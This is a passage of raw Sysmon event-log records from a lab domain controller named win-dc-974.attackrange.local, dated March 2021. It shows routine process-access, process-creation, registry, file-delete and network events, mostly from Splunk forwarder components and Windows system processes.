EL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.310{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6DA3-603E-B0AA-00000000AD01}10168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.310{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DA3-603E-B0AA-00000000AD01}10168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002239899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:55.313{05ADC7E1-6DA3-603E-B0AA-00000000AD01}10168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002239921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.529{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE2E85EC5E67FCECD22D731601EE3D04,SHA256=4BF4989795C8F6882D3D3040AE6D6F197781420C926B271EC8B582A3A7E98931,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.326{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C81CB05DAE2110EF309E292B50A0982,SHA256=F0E2835D9E893602B59A8874851B94B222C4AEF052C77772E91B258952FAF37B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.217{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DA4-603E-B1AA-00000000AD01}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.217{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.217{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.217{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.217{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.217{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DA4-603E-B1AA-00000000AD01}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.217{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DA4-603E-B1AA-00000000AD01}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002239912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.218{05ADC7E1-6DA4-603E-B1AA-00000000AD01}6872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000002239933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002239932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x14ad1646) 13241300x80000000000000002239931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d70f7c-0x41416719) 13241300x80000000000000002239930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d70f84-0xa305cf19) 13241300x80000000000000002239929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d70f8d-0x04ca3719) 13241300x80000000000000002239928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002239927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x14ad1646) 13241300x80000000000000002239926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d70f7c-0x41416719) 13241300x80000000000000002239925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d70f84-0xa305cf19) 13241300x80000000000000002239924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:53:57.842{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d70f8d-0x04ca3719) 354300x80000000000000002239923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:47.273{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60145-false10.0.1.12-8000- 23542300x80000000000000002239922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:57.342{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33AD43BA8066E745E28550A50BE7CDA7,SHA256=9FEE25C30EEB5286A6602DEA372DF7087F129F5F2539DB82C5CA1A41A695EAAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:58.389{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=245D7CA4CA3ACEA070F87E1D89FBC22B,SHA256=74363AF0CFF87FCF77B110CD08C4AEC89FBDB766D5C2A8A1977E4B991CD4255D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:58.357{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EEA30A989E4534260739C792F78700B,SHA256=C128AF14655E79C8726B109B8D2CA65AD78474609C2E83D9794A5C5AD8E8BBF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:59.375{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47202F7ED2352397876CF8C9638C3F6,SHA256=3CA75238D06F000F8F24A57CB68BEC365182EF7278FBAC5D72B576FD0D072AC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:00.389{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95C85CB7C2370D9B5F643DAD502473C3,SHA256=25DE3EC8FEEFACBA11631A42AC4E8FF47481E28A58022123B24184B7200A8353,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:01.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8230735F346587C3EE49BBDC773C2278,SHA256=BDF9C78A0941865376FD836C7B920D9D00306DA98E64234DB2E4A491F26B085F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 